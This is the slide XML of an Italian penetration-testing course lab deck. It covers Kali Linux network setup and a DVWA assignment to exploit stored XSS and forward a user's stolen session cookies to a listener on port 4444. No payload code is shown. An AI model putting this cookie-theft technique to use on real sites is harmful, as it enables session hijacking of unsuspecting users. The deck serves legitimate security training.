      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 18" id="18"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1161868" y="4294297"/>
            <a:ext cx="15381560" cy="3406776"/>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1.0 - Configurazione</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="9099"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6499">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Laboratorio</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="9099"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6499">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Virtuale</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u"/>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315989" y="6309656"/>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1834864">
            <a:off x="9393403" y="3440314"/>
            <a:ext cx="9466312" cy="8780005"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="8780005" w="9466312">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9466313" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9466313" y="8780004"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="8780004"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 5" id="5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="435682" y="-990600"/>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6" id="6"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="true"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="-5400000">
            <a:off x="2902451" y="3493000"/>
            <a:ext cx="3984893" cy="7884795"/>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6" id="16"/>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4269360" y="6484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8" id="18"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1453220" y="322023"/>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WEB APPLICATION EXPLOIT XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 19" id="19"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1146515" y="2309922"/>
            <a:ext cx="15381560" cy="688974"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="5600"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>TRACCIA - GIORNO 2 :</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 20" id="20"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1281482" y="6900495"/>
            <a:ext cx="7555813" cy="24625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000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Livello Difficoltà DVWA:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> LOW</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" marL="604523" indent="-302261" lvl="1">
              <a:lnSpc>
                <a:spcPts val="3920"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>IP Kali Linux: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>192.168.104.100/24 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" marL="604523" indent="-302261" lvl="1">
              <a:lnSpc>
                <a:spcPts val="3920"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>IP Metasploitable: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>192.168.104.150/24</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" marL="604523" indent="-302261" lvl="1">
              <a:lnSpc>
                <a:spcPts val="3920"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Listen Port: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>4444</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3920"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
        </p:txBody>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TextBox 23" id="23"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1028700" y="3076575"/>
            <a:ext cx="16230600" cy="2066925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4199"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2999">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Utilizzando le tecniche viste nelle lezione teoriche, sfruttare la vulnerabilità </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2999">
                <a:solidFill>
                  <a:srgbClr val="FFDE59"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2999">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>persistente presente sulla Web Application DVWA al fine simulare il furto di una sessione di un utente lecito del sito, inoltrando i cookie «rubati» ad Web server sotto il vostro controllo. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4199"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2999">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Spiegare il significato dello script utilizzato.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 24" id="24"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1492859" y="6115105"/>
            <a:ext cx="5642843" cy="646430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="5320"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Requisiti laboratorio:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="AutoShape 25" id="25"/>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TextBox 26" id="26"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="9456916" y="7229224"/>
            <a:ext cx="5688646" cy="1967230"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r">
              <a:lnSpc>
                <a:spcPts val="3920"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>N.B. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> I cookie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="DC0000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>dovranno essere ricevuti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> su un Web Server in ascolto sulla porta 4444</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r">
              <a:lnSpc>
                <a:spcPts val="3920"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 27" id="27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="16068096" y="7435397"/>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Tree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover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89711" y="-48764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730615"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4552496" y="339244"/>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8" id="18"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1337170" y="882169"/>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1.1 - CONFIGURAZIONE KALI LINUX</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true" rot="0">
            <a:off x="8845815" y="1717230"/>
            <a:ext cx="2510721" cy="709279"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="709279" w="2510721">
                <a:moveTo>
                  <a:pt x="0" y="709279"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2510721" y="709279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2510721" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="709279"/>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1" id="21"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="true"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:srcRect l="0" t="0" r="0" b="0"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="5709765">
            <a:off x="14599154" y="3891426"/>
            <a:ext cx="1827200" cy="1763248"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 22" id="22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="11491912" y="1637907"/>
            <a:ext cx="3060584" cy="3071399"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="3071399" w="3060584">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3060584" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3060584" y="3071399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3071399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId8"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 23" id="23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="15381676" y="7627866"/>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24" id="24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="10553534" y="5762277"/>
            <a:ext cx="6854074" cy="3262375"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="3262375" w="6854074">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6854074" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6854074" y="3262374"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3262374"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId9"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 25" id="25"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="449352" y="1747059"/>
            <a:ext cx="4080718"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KALI LINUX</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 26" id="2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TextBox 28" id="28"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="737632" y="3125982"/>
            <a:ext cx="8859048" cy="6170418"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" marL="419956" indent="-209978" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2723"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Aprire un terminale di comando</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>: Avviamo Kali Linux e apriamo un terminale di comando.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="419956" indent="-209978" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2723"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Accedere al file di configurazione di rete</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>: Digitiamo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold Italics"/>
              </a:rPr>
              <a:t>sudo nano /etc/network/interfaces</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> e premiamo Invio. Questo comando ci permetterà di accedere al file che contiene la configurazione di rete della nostra macchina.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="419956" indent="-209978" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2723"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Modificare l'indirizzo IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>: Nel file che si aprirà, cerchiamo la riga che contiene l'indirizzo IP attuale. Modifichiamolo con l'indirizzo IP richiesto.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="419956" indent="-209978" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2723"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Salvare le modifiche</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>: Per salvare le modifiche, premiamo i tasti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Control + O</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>, poi premiamo Invio e per chiudere l'editor nano, premiamo i tasti </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Control + X</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="419956" indent="-209978" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2723"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Semi-Bold"/>
              </a:rPr>
              <a:t>Riavviare la macchina</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>: Digitiamo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>reboot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> nel terminale e premiamo Invio per riavviare la macchina.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="419956" indent="-209978" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2723"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Semi-Bold"/>
              </a:rPr>
              <a:t>Verificare la modifica dell'indirizzo IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>: Dopo il riavvio, riapriamo un terminale di comando e digitiamo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Semi-Bold"/>
              </a:rPr>
              <a:t>ifconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>. Questo comando ci mostrerà la configurazione della rete attuale. Verifichiamo che l'indirizzo IP sia stato modificato correttamente.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2723"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
        </p:txBody>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219042" y="442756"/>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0100167" y="3204897"/>
            <a:ext cx="7548481" cy="7001216"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="7001216" w="7548481">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7548482" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7548482" y="7001216"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="7001216"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 16" id="16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="13661829" y="1050055"/>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2110547" y="3815306"/>
            <a:ext cx="14768151" cy="2118334"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="7769"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="0" indent="0" lvl="0">
              <a:lnSpc>
                <a:spcPts val="7769"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="10499" spc="-955">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Bank Gothic"/>
              </a:rPr>
              <a:t>GIORNO   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="10499" spc="-955">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Bank Gothic"/>
              </a:rPr>
              <a:t>1</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2" id="22"/>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
        <p:nvSpPr>
          <p:cNvPr name="TextBox 23" id="23"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="4659592" y="6724069"/>
            <a:ext cx="14768151" cy="1177056"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4292"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5800" spc="-527">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Bank Gothic"/>
              </a:rPr>
              <a:t>WEB APPLICATION </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="0" indent="0" lvl="0">
              <a:lnSpc>
                <a:spcPts val="4292"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
